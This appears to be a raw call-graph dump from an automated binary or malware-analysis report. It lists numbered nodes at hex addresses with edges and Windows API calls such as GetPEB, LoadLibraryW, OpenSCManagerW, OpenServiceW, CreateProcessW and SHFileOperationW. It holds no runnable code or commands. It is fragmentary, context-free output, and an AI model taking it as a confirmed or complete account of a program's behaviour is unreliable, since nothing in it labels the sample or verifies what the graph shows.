3b7fd7 6926->6927 6929 3b3e60 GetPEB 6927->6929 6933 3b8051 6928->6933 6934 3b3f00 GetPEB 6928->6934 6929->6925 6931 3b801d 6930->6931 6932 3b3e60 GetPEB 6931->6932 6932->6928 6936 3b807d 6933->6936 6938 3b3f00 GetPEB 6933->6938 6935 3b8045 6934->6935 6937 3b3e60 GetPEB 6935->6937 6937->6933 6939 3b8071 6938->6939 6940 3b3e60 GetPEB 6939->6940 6940->6936 7108 3b4df0 GetPEB 7109 3b4869 7114 3b4870 7109->7114 7110 3b496e 7112 3b492c 7110->7112 7113 3b3f00 GetPEB 7110->7113 7111 3b3f00 GetPEB 7111->7114 7115 3b4981 7113->7115 7114->7110 7114->7111 7114->7112 7117 3b3e60 GetPEB 7114->7117 7116 3b3e60 GetPEB 7115->7116 7116->7112 7117->7114 6941 3b1928 6951 3b191f 6941->6951 6942 3b1bc6 6943 3b35c0 GetPEB 6942->6943 6945 3b1bd0 6943->6945 6944 3b1ba4 6946 3b1bf1 6945->6946 6947 3b3f00 GetPEB 6945->6947 6953 3b3f00 GetPEB 6946->6953 6957 3b1c23 6946->6957 6949 3b1be5 6947->6949 6948 3b3f00 GetPEB 6948->6951 6952 3b3e60 GetPEB 6949->6952 6950 3b4e30 GetPEB 6950->6951 6951->6942 6951->6944 6951->6948 6951->6950 6961 3b35c0 GetPEB 6951->6961 6962 3b3e60 GetPEB 6951->6962 6952->6946 6954 3b1c17 6953->6954 6955 3b3e60 GetPEB 6954->6955 6955->6957 6956 3b1c4b 6957->6956 6958 3b3f00 GetPEB 6957->6958 6959 3b1c3f 6958->6959 6960 3b3e60 GetPEB 6959->6960 6960->6956 6961->6951 6962->6951 5943 3b30a0 5944 3b30ba 5943->5944 5945 3b32ab 5944->5945 5946 3b3f00 GetPEB 5944->5946 5949 3b3238 5944->5949 5950 3b3291 RtlAllocateHeap 5944->5950 5952 3b3e60 GetPEB 5944->5952 5945->5949 5953 3b3f00 GetPEB 5945->5953 5946->5944 5950->5944 5950->5949 5952->5944 5954 3b32bf 5953->5954 5955 3b3e60 5954->5955 5956 3b3ebc 5955->5956 5957 3b3e9c 5955->5957 5956->5949 5957->5956 5958 3b3f00 GetPEB 5957->5958 5961 3b40f5 5957->5961 5959 3b40e9 5958->5959 5960 3b3e60 GetPEB 5959->5960 5960->5961 5962 3b3f00 GetPEB 5961->5962 5968 3b4126 5961->5968 5964 3b411a 5962->5964 5963 3b3e60 GetPEB 5966 3b4157 5963->5966 5967 3b3e60 GetPEB 5964->5967 5965 3b4138 5965->5949 5966->5949 5967->5968 5968->5963 5968->5965 6018 3b5ce0 6026 3b65e0 6018->6026 6020 3b5ce5 6021 3b5d09 ExitProcess 6020->6021 6022 3b3f00 GetPEB 6020->6022 6023 3b5cf8 6022->6023 6024 3b3e60 GetPEB 6023->6024 6025 3b5d04 6024->6025 6025->6021 6070 3b65fd 6026->6070 6028 3b68df 6028->6020 6029 3b6dcd 6342 3bb2e0 6029->6342 6032 3b706e 6367 3b8740 6032->6367 6038 3b7061 6358 3b8d40 6038->6358 6043 3b3f00 GetPEB 6043->6070 6044 3b7073 6044->6020 6047 3b6f27 GetTickCount 6047->6070 6051 3b4220 GetPEB 6051->6070 6052 3b7066 6052->6020 6058 3b3f00 GetPEB 6059 3b6927 6058->6059 6059->6047 6059->6058 6064 3b6975 GetTickCount 6059->6064 6067 3b3e60 GetPEB 6059->6067 6063 3b3e60 GetPEB 6063->6070 6064->6070 6067->6059 6070->6028 6070->6029 6070->6032 6070->6038 6070->6043 6070->6051 6070->6059 6070->6063 6071 3b4160 GetPEB 6070->6071 6072 3b8400 6070->6072 6078 3b7120 6070->6078 6099 3b8e80 6070->6099 6109 3b8970 6070->6109 6121 3b80a0 6070->6121 6133 3b9860 6070->6133 6149 3b9620 6070->6149 6158 3b12b0 6070->6158 6179 3bafe0 6070->6179 6184 3b8700 6070->6184 6190 3b6060 6070->6190 6211 3bb430 6070->6211 6218 3b9f30 6070->6218 6227 3b61e0 6070->6227 6239 3b94d0 6070->6239 6246 3b3310 6070->6246 6256 3b1840 6070->6256 6271 3b3460 6070->6271 6281 3b53d0 6070->6281 6286 3b9270 6070->6286 6296 3b8bb0 6070->6296 6306 3b72d0 6070->6306 6316 3b9050 6070->6316 6330 3b4770 6070->6330 6347 3bb1d0 6070->6347 6352 3b7410 6070->6352 6071->6070 6075 3b84e3 6072->6075 6073 3b85bd 6073->6070 6074 3b8600 CreateFileW 6074->6073 6074->6075 6075->6073 6075->6074 6076 3b3f00 GetPEB 6075->6076 6077 3b3e60 GetPEB 6075->6077 6076->6075 6077->6075 6080 3b7125 6078->6080 6079 3b7233 6385 3b34c0 6079->6385 6080->6079 6082 3b7232 6080->6082 6088 3b7080 GetPEB LoadLibraryW 6080->6088 6082->6070 6083 3b723f 6084 3b7265 LoadLibraryW 6083->6084 6085 3b3f00 GetPEB 6083->6085 6086 3b727a 6084->6086 6087 3b7290 6084->6087 6089 3b7254 6085->6089 6090 3b3f00 GetPEB 6086->6090 6095 3b72b8 6087->6095 6096 3b3f00 GetPEB 6087->6096 6088->6080 6091 3b3e60 GetPEB 6089->6091 6092 3b7284 6090->6092 6093 3b7260 6091->6093 6094 3b3e60 GetPEB 6092->6094 6093->6084 6094->6087 6095->6070 6097 3b72ac 6096->6097 6098 3b3e60 GetPEB 6097->6098 6098->6095 6106 3b8ea0 6099->6106 6100 3b901b 6103 3b3f00 GetPEB 6100->6103 6105 3b8fc6 6100->6105 6101 3b8ff2 OpenServiceW 6101->6106 6102 3b3f00 GetPEB 6102->6106 6104 3b902e 6103->6104 6107 3b3e60 GetPEB 6104->6107 6105->6070 6106->6100 6106->6101 6106->6102 6106->6105 6108 3b3e60 GetPEB 6106->6108 6107->6105 6108->6106 6119 3b8991 6109->6119 6110 3b34c0 GetPEB 6110->6119 6111 3b8b74 6113 3b8add 6111->6113 6114 3b3f00 GetPEB 6111->6114 6113->6070 6115 3b8b87 6114->6115 6118 3b3e60 GetPEB 6115->6118 6116 3b3f00 GetPEB 6116->6119 6117 3b3e60 GetPEB 6117->6119 6118->6113 6119->6110 6119->6111 6119->6113 6119->6116 6119->6117 6120 3b3460 GetPEB 6119->6120 6395 3b5040 6119->6395 6120->6119 6131 3b8163 6121->6131 6122 3b34c0 GetPEB 6122->6131 6123 3b8397 CreateFileW 6125 3b83e6 6123->6125 6123->6131 6124 3b83c7 6124->6125 6128 3b3f00 GetPEB 6124->6128 6125->6070 6126 3b8358 6126->6070 6127 3b3f00 GetPEB 6127->6131 6129 3b83da 6128->6129 6130 3b3e60 GetPEB 6129->6130 6130->6125 6131->6122 6131->6123 6131->6124 6131->6126 6131->6127 6132 3b3e60 GetPEB 6131->6132 6132->6131 6148 3b9880 6133->6148 6134 3b9b02 6136 3b9b26 SHGetFolderPathW 6134->6136 6139 3b3f00 GetPEB 6134->6139 6135 3b99b2 OpenSCManagerW 6135->6148 6420 3b3040 6136->6420 6137 3b3f00 GetPEB 6137->6148 6138 3b9969 SHGetFolderPathW 6138->6148 6143 3b9b15 6139->6143 6140 3b9a66 CloseServiceHandle 6140->6148 6145 3b3e60 GetPEB 6143->6145 6144 3b9af5 6144->6070 6146 3b9b21 6145->6146 6146->6136 6147 3b3e60 GetPEB 6147->6148 6148->6134 6148->6135 6148->6137 6148->6138 6148->6140 6148->6144 6148->6147 6425 3b7c60 6148->6425 6157 3b9630 6149->6157 6150 3b981f 6150->6070 6151 3b9829 6449 3b3780 6151->6449 6153 3b9839 6153->6070 6154 3b3f00 GetPEB 6154->6157 6155 3b34c0 GetPEB 6155->6157 6156 3b3e60 GetPEB 6156->6157 6157->6150 6157->6151 6157->6154 6157->6155 6157->6156 6168 3b12e1 6158->6168 6160 3b181c 6578 3b4220 6160->6578 6161 3b4220 GetPEB 6161->6168 6163 3b34c0 GetPEB 6163->6168 6164 3b42c0 GetPEB 6164->6168 6166 3b17d1 6166->6070 6168->6160 6168->6161 6168->6163 6168->6164 6168->6166 6170 3b3e60 GetPEB 6168->6170 6172 3b3f00 GetPEB 6168->6172 6173 3b1641 _snwprintf 6168->6173 6178 3b3460 GetPEB 6168->6178 6476 3b1fc0 6168->6476 6484 3b1e70 6168->6484 6493 3b5c00 6168->6493 6512 3b1c70 6168->6512 6528 3b2230 6168->6528 6536 3b2be0 6168->6536 6551 3b4ea0 6168->6551 6556 3b1900 6168->6556 6170->6168 6172->6168 6176 3b3460 GetPEB 6173->6176 6176->6168 6178->6168 6180 3bb101 6179->6180 6183 3baff8 6179->6183 6180->6070 6181 3b3e60 GetPEB 6181->6183 6182 3b3f00 GetPEB 6182->6183 6183->6180 6183->6181 6183->6182 6185 3b8709 6184->6185 6186 3b871f 6184->6186 6187 3b3f00 GetPEB 6185->6187 6186->6070 6188 3b8713 6187->6188 6189 3b3e60 GetPEB 6188->6189 6189->6186 6620 3b5500 6190->6620 6192 3b613c 6194 3b35c0 GetPEB 6192->6194 6193 3b6134 6193->6070 6196 3b6147 6194->6196 6195 3b3f00 GetPEB 6201 3b6074 6195->6201 6198 3b6168 6196->6198 6199 3b3f00 GetPEB 6196->6199 6197 3b3e60 GetPEB 6197->6201 6203 3b61a2 6198->6203 6204 3b3f00 GetPEB 6198->6204 6200 3b615c 6199->6200 6202 3b3e60 GetPEB 6200->6202 6201->6192 6201->6193 6201->6195 6201->6197 6202->6198 6207 3b61ca 6203->6207 6208 3b3f00 GetPEB 6203->6208 6205 3b6196 6204->6205 6206 3b3e60 GetPEB 6205->6206 6206->6203 6207->6070 6209 3b61be 6208->6209 6210 3b3e60 GetPEB 6209->6210 6210->6207 6213 3bb440 6211->6213 6212 3bb4ba 6212->6070 6213->6212 6630 3bab50 6213->6630 6646 3ba170 6213->6646 6667 3ba7a0 6213->6667 6687 3ba5e0 6213->6687 6225 3b9f40 6218->6225 6219 3ba01b 6220 3b9f64 6219->6220 6222 3b3f00 GetPEB 6219->6222 6220->6070 6221 3b3f00 GetPEB 6221->6225 6223 3ba02e 6222->6223 6224 3b3e60 GetPEB 6223->6224 6224->6220 6225->6219 6225->6220 6225->6221 6226 3b3e60 GetPEB 6225->6226 6226->6225 6236 3b6202 6227->6236 6228 3b42c0 GetPEB 6228->6236 6229 3b624b 6229->6070 6232 3b3e60 GetPEB 6232->6236 6233 3b3f00 GetPEB 6233->6236 6234 3b6490 6234->6070 6235 3b3f00 GetPEB 6237 3b642d 6235->6237 6236->6228 6236->6229 6236->6232 6236->6233 6236->6237 6802 3b55b0 6236->6802 6811 3b4c80 6236->6811 6237->6234 6237->6235 6238 3b3e60 GetPEB 6237->6238 6238->6237 6240 3b94f0 6239->6240 6241 3b95c2 6240->6241 6243 3b4c80 GetPEB 6240->6243 6244 3b3f00 GetPEB 6240->6244 6245 3b3e60 GetPEB 6240->6245 6820 3b46c0 6240->6820 6241->6070 6243->6240 6244->6240 6245->6240 6247 3b334a 6246->6247 6248 3b336f 6247->6248 6249 3b3f00 GetPEB 6247->6249 6252 3b3f00 GetPEB 6248->6252 6255 3b3397 6248->6255 6250 3b3363 6249->6250 6251 3b3e60 GetPEB 6250->6251 6251->6248 6253 3b338b 6252->6253 6254 3b3e60 GetPEB 6253->6254 6254->6255 6255->6070 6257 3b184c 6256->6257 6258 3b1862 6256->6258 6259 3b3f00 GetPEB 6257->6259 6262 3b3f00 GetPEB 6258->6262 6266 3b188b 6258->6266 6260 3b1856 6259->6260 6261 3b3e60 GetPEB 6260->6261 6261->6258 6263 3b187f 6262->6263 6265 3b3e60 GetPEB 6263->6265 6264 3b18ee 6264->6070 6265->6266 6266->6264 6266->6266 6835 3b25e0 6266->6835 6268 3b18d8 6269 3b18dc 6268->6269 6270 3b4220 GetPEB 6268->6270 6269->6070 6270->6264 6272 3b346d 6271->6272 6275 3b3483 6271->6275 6273 3b3f00 GetPEB 6272->6273 6274 3b3477 6273->6274 6276 3b3e60 GetPEB 6274->6276 6277 3b3f00 GetPEB 6275->6277 6279 3b34ab 6275->6279 6276->6275 6278 3b349f 6277->6278 6280 3b3e60 GetPEB 6278->6280 6279->6070 6280->6279 6282 3b53e0 6281->6282 6283 3b54b4 6282->6283 6284 3b3f00 GetPEB 6282->6284 6285 3b3e60 GetPEB 6282->6285 6283->6070 6284->6282 6285->6282 6294 3b9290 6286->6294 6288 3b949c 6289 3b9410 6288->6289 6291 3b3f00 GetPEB 6288->6291 6289->6070 6290 3b3f00 GetPEB 6290->6294 6292 3b94af 6291->6292 6293 3b3e60 GetPEB 6292->6293 6293->6289 6294->6288 6294->6289 6294->6290 6295 3b3e60 GetPEB 6294->6295 6850 3b1000 6294->6850 6295->6294 6303 3b8bc4 6296->6303 6297 3b8d1d 6859 3b36b0 6297->6859 6298 3b3780 2 API calls 6298->6303 6300 3b8d10 6300->6070 6302 3b34c0 GetPEB 6302->6303 6303->6297 6303->6298 6303->6300 6303->6302 6304 3b3f00 GetPEB 6303->6304 6305 3b3e60 GetPEB 6303->6305 6304->6303 6305->6303 6307 3b72d9 6306->6307 6309 3b72ef 6306->6309 6308 3b3f00 GetPEB 6307->6308 6310 3b72e3 6308->6310 6311 3b7318 6309->6311 6313 3b3f00 GetPEB 6309->6313 6312 3b3e60 GetPEB 6310->6312 6311->6070 6312->6309 6314 3b730c 6313->6314 6315 3b3e60 GetPEB 6314->6315 6315->6311 6328 3b9070 6316->6328 6317 3b91de 6317->6070 6318 3b91e4 6319 3b921f 6318->6319 6320 3b3f00 GetPEB 6318->6320 6324 3b9247 6319->6324 6325 3b3f00 GetPEB 6319->6325 6321 3b9213 6320->6321 6323 3b3e60 GetPEB 6321->6323 6322 3b3e60 GetPEB 6322->6328 6323->6319 6324->6070 6326 3b923b 6325->6326 6329 3b3e60 GetPEB 6326->6329 6327 3b3f00 GetPEB 6327->6328 6328->6317 6328->6318 6328->6322 6328->6327 6329->6324 6331 3b4785 6330->6331 6340 3b479b 6330->6340 6332 3b3f00 GetPEB 6331->6332 6334 3b478f 6332->6334 6333 3b47cb GetCurrentProcessId 6336 3b47d5 6333->6336 6337 3b3e60 GetPEB 6334->6337 6335 3b3f00 GetPEB 6338 3b47b7 6335->6338 6336->6070 6337->6340 6339 3b3e60 GetPEB 6338->6339 6341 3b47c3 6339->6341 6340->6333 6340->6335 6341->6333 6346 3bb2ec 6342->6346 6343 3bb422 6343->6028 6344 3b3f00 GetPEB 6344->6346 6345 3b3e60 GetPEB 6345->6346 6346->6343 6346->6344 6346->6345 6351 3bb1e0 6347->6351 6348 3bb2b2 6348->6070 6349 3b3e60 GetPEB 6349->6351 6350 3b3f00 GetPEB 6350->6351 6351->6348 6351->6349 6351->6350 6356 3b7420 6352->6356 6353 3b7608 6353->6070 6354 3b3f00 GetPEB 6354->6356 6355 3b4fd0 GetPEB 6355->6356 6356->6353 6356->6354 6356->6355 6357 3b3e60 GetPEB 6356->6357 6357->6356 6365 3b8d50 6358->6365 6359 3b8e3f 6360 3b4b70 2 API calls 6359->6360 6362 3b8e4f 6360->6362 6361 3b8e29 6361->6052 6362->6052 6363 3b34c0 GetPEB 6363->6365 6364 3b3f00 GetPEB 6364->6365 6365->6359 6365->6361 6365->6363 6365->6364 6366 3b3e60 GetPEB 6365->6366 6366->6365 6384 3b8753 6367->6384 6368 3b34c0 GetPEB 6368->6384 6369 3b88df 6369->6044 6370 3b8903 6372 3b8922 6370->6372 6373 3b3f00 GetPEB 6370->6373 6379 3b8955 6372->6379 6380 3b3f00 GetPEB 6372->6380 6376 3b8916 6373->6376 6374 3b8e80 2 API calls 6374->6384 6375 3b3e60 GetPEB 6375->6384 6377 3b3e60 GetPEB 6376->6377 6377->6372 6378 3b3f00 GetPEB 6378->6384 6379->6044 6382 3b8949 6380->6382 6381 3b3780 2 API calls 6381->6384 6383 3b3e60 GetPEB 6382->6383 6383->6379 6384->6368 6384->6369 6384->6370 6384->6374 6384->6375 6384->6378 6384->6381 6878 3b7700 6384->6878 6386 3b34e3 6385->6386 6387 3b3f00 GetPEB 6386->6387 6390 3b3508 6386->6390 6388 3b34fc 6387->6388 6389 3b3e60 GetPEB 6388->6389 6389->6390 6391 3b3f00 GetPEB 6390->6391 6394 3b3530 6390->6394 6392 3b3524 6391->6392 6393 3b3e60 GetPEB 6392->6393 6393->6394 6394->6083 6394->6394 6409 3b505c 6395->6409 6396 3b5367 6397 3b3f00 GetPEB 6396->6397 6399 3b5386 6396->6399 6398 3b537a 6397->6398 6400 3b3e60 GetPEB 6398->6400 6401 3b53ae 6399->6401 6404 3b3f00 GetPEB 6399->6404 6400->6399 6401->6119 6402 3b3f00 GetPEB 6402->6409 6407 3b53a2 6404->6407 6405 3b3e60 GetPEB 6405->6409 6406 3b534d RtlAllocateHeap 6406->6401 6406->6409 6408 3b3e60 GetPEB 6407->6408 6408->6401 6409->6396 6409->6401 6409->6402 6409->6405 6409->6406 6410 3b42c0 6409->6410 6411 3b42e3 6410->6411 6412 3b42cd 6410->6412 6416 3b430b 6411->6416 6417 3b3f00 GetPEB 6411->6417 6413 3b3f00 GetPEB 6412->6413 6414 3b42d7 6413->6414 6415 3b3e60 GetPEB 6414->6415 6415->6411 6416->6409 6418 3b42ff 6417->6418 6419 3b3e60 GetPEB 6418->6419 6419->6416 6421 3b3050 6420->6421 6423 3b307a 6421->6423 6435 3b38f0 6421->6435 6423->6144 6424 3b3092 6424->6144 6426 3b7c80 6425->6426 6427 3b7ddd 6426->6427 6428 3b7d97 6426->6428 6429 3b3f00 GetPEB 6426->6429 6432 3b3e60 GetPEB 6426->6432 6430 3b3f00 GetPEB 6427->6430 6431 3b7dfd 6427->6431 6428->6148 6429->6426 6433 3b7df1 6430->6433 6431->6148 6432->6426 6434 3b3e60 GetPEB 6433->6434 6434->6431 6443 3b3910 6435->6443 6436 3b3a3b FindFirstFileW 6436->6443 6446 3b3b8f 6436->6446 6437 3b3ac1 6437->6424 6438 3b3b70 6440 3b3f00 GetPEB 6438->6440 6438->6446 6439 3b3f00 GetPEB 6439->6443 6442 3b3b83 6440->6442 6441 3b3e60 GetPEB 6441->6443 6444 3b3e60 GetPEB 6442->6444 6443->6436 6443->6437 6443->6438 6443->6439 6443->6441 6445 3b34c0 GetPEB 6443->6445 6447 3b38f0 GetPEB 6443->6447 6448 3b3460 GetPEB 6443->6448 6444->6446 6445->6443 6446->6424 6447->6443 6448->6443 6450 3b37ab 6449->6450 6451 3b3795 6449->6451 6454 3b37dd 6450->6454 6456 3b3f00 GetPEB 6450->6456 6452 3b3f00 GetPEB 6451->6452 6453 3b379f 6452->6453 6455 3b3e60 GetPEB 6453->6455 6459 3b3812 6454->6459 6460 3b3f00 GetPEB 6454->6460 6455->6450 6457 3b37d1 6456->6457 6458 3b3e60 GetPEB 6457->6458 6458->6454 6462 3b384a 6459->6462 6464 3b3f00 GetPEB 6459->6464 6461 3b3806 6460->6461 6463 3b3e60 GetPEB 6461->6463 6467 3b3876 6462->6467 6468 3b3f00 GetPEB 6462->6468 6463->6459 6465 3b383e 6464->6465 6466 3b3e60 GetPEB 6465->6466 6466->6462 6470 3b38d1 SHFileOperationW 6467->6470 6472 3b3f00 GetPEB 6467->6472 6469 3b386a 6468->6469 6471 3b3e60 GetPEB 6469->6471 6470->6153 6471->6467 6473 3b38c0 6472->6473 6474 3b3e60 GetPEB 6473->6474 6475 3b38cc 6474->6475 6475->6470 6483 3b1fd2 6476->6483 6477 3b2212 6478 3b2208 6477->6478 6480 3b4220 GetPEB 6477->6480 6478->6168 6479 3b42c0 GetPEB 6479->6483 6480->6478 6481 3b3f00 GetPEB 6481->6483 6482 3b3e60 GetPEB 6482->6483 6483->6477 6483->6478 6483->6479 6483->6481 6483->6482 6489 3b1e86 6484->6489 6485 3b1f77 6486 3b1f68 6485->6486 6487 3b3f00 GetPEB 6485->6487 6486->6168 6488 3b1f98 6487->6488 6490 3b3e60 GetPEB 6488->6490 6489->6485 6489->6486 6491 3b3e60 GetPEB 6489->6491 6492 3b3f00 GetPEB 6489->6492 6490->6486 6491->6489 6492->6489 6494 3b5c26 6493->6494 6495 3b5c10 6493->6495 6499 3b3f00 GetPEB 6494->6499 6503 3b5c4e 6494->6503 6496 3b3f00 GetPEB 6495->6496 6497 3b5c1a 6496->6497 6498 3b3e60 GetPEB 6497->6498 6498->6494 6500 3b5c42 6499->6500 6502 3b3e60 GetPEB 6500->6502 6501 3b5cd2 6501->6168 6502->6503 6503->6501 6504 3b5c99 6503->6504 6505 3b3f00 GetPEB 6503->6505 6508 3b3f00 GetPEB 6504->6508 6511 3b5cc1 6504->6511 6506 3b5c8d 6505->6506 6507 3b3e60 GetPEB 6506->6507 6507->6504 6509 3b5cb5 6508->6509 6510 3b3e60 GetPEB 6509->6510 6510->6511 6511->6168 6513 3b1d06 6512->6513 6514 3b1cf0 6512->6514 6518 3b1dad 6513->6518 6519 3b3f00 GetPEB 6513->6519 6515 3b3f00 GetPEB 6514->6515 6516 3b1cfa 6515->6516 6517 3b3e60 GetPEB 6516->6517 6517->6513 6521 3b1de1 6518->6521 6523 3b3f00 GetPEB 6518->6523 6520 3b1da1 6519->6520 6522 3b3e60 GetPEB 6520->6522 6526 3b4ea0 GetPEB 6521->6526 6522->6518 6524 3b1dd5 6523->6524 6525 3b3e60 GetPEB 6524->6525 6525->6521 6527 3b1e15 6526->6527 6527->6168 6529 3b2255 6528->6529 6530 3b229c 6529->6530 6531 3b3f00 GetPEB 6529->6531 6533 3b25be 6529->6533 6534 3b3e60 GetPEB 6529->6534 6530->6168 6531->6529 6532 3b25cd 6532->6168 6533->6532 6535 3b4220 GetPEB 6533->6535 6534->6529 6535->6532 6548 3b2c1a 6536->6548 6537 3b2fcf 6540 3b2fee 6537->6540 6541 3b3f00 GetPEB 6537->6541 6539 3b2cae 6539->6168 6540->6168 6544 3b2fe2 6541->6544 6542 3b3f00 GetPEB 6542->6548 6543 3b34c0 GetPEB 6543->6548 6545 3b3e60 GetPEB 6544->6545 6545->6540 6546 3b3e60 GetPEB 6546->6548 6547 3b3460 GetPEB 6547->6548 6548->6537 6548->6539 6548->6542 6548->6543 6548->6546 6548->6547 6550 3b4220 GetPEB 6548->6550 6588 3b56f0 6548->6588 6597 3b2980 6548->6597 6550->6548 6552 3b4eb6 6551->6552 6552->6552 6553 3b4f3d 6552->6553 6554 3b3f00 GetPEB 6552->6554 6555 3b3e60 GetPEB 6552->6555 6553->6168 6554->6552 6555->6552 6572 3b191f 6556->6572 6557 3b1bc6 6558 3b35c0 GetPEB 6557->6558 6560 3b1bd0 6558->6560 6559 3b1ba4 6559->6168 6562 3b1bf1 6560->6562 6563 3b3f00 GetPEB 6560->6563 6561 3b3f00 GetPEB 6561->6572 6567 3b1c23 6562->6567 6569 3b3f00 GetPEB 6562->6569 6565 3b1be5 6563->6565 6564 3b3e60 GetPEB 6564->6572 6568 3b3e60 GetPEB 6565->6568 6566 3b4e30 GetPEB 6566->6572 6573 3b3f00 GetPEB 6567->6573 6577 3b1c4b 6567->6577 6568->6562 6570 3b1c17 6569->6570 6571 3b3e60 GetPEB 6570->6571 6571->6567 6572->6557 6572->6559 6572->6561 6572->6564 6572->6566 6610 3b35c0 6572->6610 6574 3b1c3f 6573->6574 6575 3b3e60 GetPEB 6574->6575 6575->6577 6577->6168 6579 3b4243 6578->6579 6580 3b422d 6578->6580 6584 3b3f00 GetPEB 6579->6584 6586 3b426b 6579->6586 6581 3b3f00 GetPEB 6580->6581 6582 3b4237 6581->6582 6583 3b3e60 GetPEB 6582->6583 6583->6579 6585 3b425f 6584->6585 6587 3b3e60 GetPEB 6585->6587 6586->6166 6587->6586 6591 3b5701 6588->6591 6589 3b5723 6589->6548 6590 3b57e3 6590->6589 6592 3b3f00 GetPEB 6590->6592 6591->6589 6591->6590 6593 3b3f00 GetPEB 6591->6593 6596 3b3e60 GetPEB 6591->6596 6594 3b57f6 6592->6594 6593->6591 6595 3b3e60 GetPEB 6594->6595 6595->6589 6596->6591 6603 3b29a0 6597->6603 6598 3b2abf 6600 3b2b0c 6598->6600 6601 3b2ae4 6598->6601 6602 3b3f00 GetPEB 6598->6602 6599 3b3f00 GetPEB 6599->6603 6600->6548 6601->6600 6607 3b3f00 GetPEB 6601->6607 6604 3b2ad8 6602->6604 6603->6598 6603->6599 6606 3b3e60 GetPEB 6603->6606 6605 3b3e60 GetPEB 6604->6605 6605->6601 6606->6603 6608 3b2b00 6607->6608 6609 3b3e60 GetPEB 6608->6609 6609->6600 6611 3b35e4 6610->6611 6612 3b3609 6611->6612 6613 3b3f00 GetPEB 6611->6613 6616 3b3f00 GetPEB 6612->6616 6619 3b3631 6612->6619 6614 3b35fd 6613->6614 6615 3b3e60 GetPEB 6614->6615 6615->6612 6617 3b3625 6616->6617 6618 3b3e60 GetPEB 6617->6618 6618->6619 6619->6572 6621 3b5516 6620->6621 6625 3b552c 6620->6625 6622 3b3f00 GetPEB 6621->6622 6623 3b5520 6622->6623 6624 3b3e60 GetPEB 6623->6624 6624->6625 6626 3b5586 6625->6626 6627 3b3f00 GetPEB 6625->6627 6626->6201 6628 3b557a 6627->6628 6629 3b3e60 GetPEB 6628->6629 6629->6626 6644 3bab66 6630->6644 6631 3bab8c 6631->6213 6634 3bac52 6635 3bac71 6634->6635 6637 3b3f00 GetPEB 6634->6637 6640 3bac99 6635->6640 6641 3b3f00 GetPEB 6635->6641 6636 3b3f00 GetPEB 6636->6644 6638 3bac65 6637->6638 6639 3b3e60 GetPEB 6638->6639 6639->6635 6640->6213 6643 3bac8d 6641->6643 6642 3b3e60 GetPEB 6642->6644 6645 3b3e60 GetPEB 6643->6645 6644->6631 6644->6634 6644->6636 6644->6642 6703 3b4b70 6644->6703 6725 3bacd0 6644->6725 6645->6640 6666 3ba189 6646->6666 6647 3bacd0 GetPEB 6647->6666 6648 3ba552 6650 3ba571 6648->6650 6653 3b3f00 GetPEB 6648->6653 6649 3ba439 6649->6213 6660 3ba599 6650->6660 6662 3b3f00 GetPEB 6650->6662 6652 3b34c0 GetPEB 6652->6666 6655 3ba565 6653->6655 6654 3b4220 GetPEB 6654->6666 6658 3b3e60 GetPEB 6655->6658 6656 3b4b70 2 API calls 6656->6666 6657 3b3f00 GetPEB 6657->6666 6658->6650 6660->6213 6661 3b3e60 GetPEB 6661->6666 6663 3ba58d 6662->6663 6665 3b3e60 GetPEB 6663->6665 6664 3b3460 GetPEB 6664->6666 6665->6660 6666->6647 6666->6648 6666->6649 6666->6652 6666->6654 6666->6656 6666->6657 6666->6661 6666->6664 6735 3bb520 6666->6735 6743 3b1150 6666->6743 6686 3ba7c5 6667->6686 6668 3bacd0 GetPEB 6668->6686 6669 3baa7c GetCurrentProcessId 6669->6686 6670 3baa19 6670->6213 6671 3baacd 6673 3baaec 6671->6673 6676 3b3f00 GetPEB 6671->6676 6672 3b4b70 2 API calls 6672->6686 6680 3bab14 6673->6680 6681 3b3f00 GetPEB 6673->6681 6678 3baae0 6676->6678 6677 3b42c0 GetPEB 6677->6686 6679 3b3e60 GetPEB 6678->6679 6679->6673 6680->6213 6684 3bab08 6681->6684 6682 3b3f00 GetPEB 6682->6686 6683 3b3e60 GetPEB 6683->6686 6685 3b3e60 GetPEB 6684->6685 6685->6680 6686->6668 6686->6669 6686->6670 6686->6671 6686->6672 6686->6677 6686->6682 6686->6683 6758 3b49a0 6686->6758 6768 3b4850 6686->6768 6696 3ba5ef 6687->6696 6688 3ba710 6688->6213 6689 3b3f00 GetPEB 6689->6696 6690 3ba731 6692 3ba750 6690->6692 6694 3b3f00 GetPEB 6690->6694 6699 3ba778 6692->6699 6700 3b3f00 GetPEB 6692->6700 6693 3b42c0 GetPEB 6693->6696 6695 3ba744 6694->6695 6697 3b3e60 GetPEB 6695->6697 6696->6688 6696->6689 6696->6690 6696->6693 6698 3b3e60 GetPEB 6696->6698 6777 3b4370 6696->6777 6697->6692 6698->6696 6699->6213 6701 3ba76c 6700->6701 6702 3b3e60 GetPEB 6701->6702 6702->6699 6704 3b4b82 6703->6704 6707 3b4b98 6703->6707 6705 3b3f00 GetPEB 6704->6705 6706 3b4b8c 6705->6706 6708 3b3e60 GetPEB 6706->6708 6709 3b4bd7 CreateProcessW 6707->6709 6712 3b3f00 GetPEB 6707->6712 6708->6707 6710 3b4c73 6709->6710 6711 3b4bf7 6709->6711 6710->6644 6713 3b4bff 6711->6713 6715 3b4c33 6711->6715 6718 3b3f00 GetPEB 6711->6718 6714 3b4bc6 6712->6714 6713->6644 6716 3b3e60 GetPEB 6714->6716 6721 3b4c5d 6715->6721 6722 3b3f00 GetPEB 6715->6722 6717 3b4bd2 6716->6717 6717->6709 6719 3b4c27 6718->6719 6720 3b3e60 GetPEB 6719->6720 6720->6715 6721->6644 6723 3b4c51 6722->6723 6724 3b3e60 GetPEB 6723->6724 6724->6721 6731 3baced 6725->6731 6726 3b34c0 GetPEB 6726->6731 6727 3baf9f 6729 3baf37 6727->6729 6730 3b3f00 GetPEB 6727->6730 6728 3b3f00 GetPEB 6728->6731 6729->6644 6732 3bafb2 6730->6732 6731->6726 6731->6727 6731->6728 6731->6729 6734 3b3e60 GetPEB 6731->6734 6733 3b3e60 GetPEB 6732->6733 6733->6729 6734->6731 6741 3bb536 6735->6741 6736 3bb55f 6736->6666 6737 3bb633 6752 3b4fd0 6737->6752 6739 3bb63f 6739->6666 6740 3b3f00 GetPEB 6740->6741 6741->6736 6741->6737 6741->6739 6741->6740 6742 3b3e60 GetPEB 6741->6742 6742->6741 6751 3b1160 6743->6751 6744 3b124c 6745 3b3f00 GetPEB 6744->6745 6747 3b1244 6744->6747 6746 3b125f 6745->6746 6748 3b3e60 GetPEB 6746->6748 6747->6666 6748->6747 6749 3b3f00 GetPEB 6749->6751 6750 3b3e60 GetPEB 6750->6751 6751->6744 6751->6747 6751->6749 6751->6750 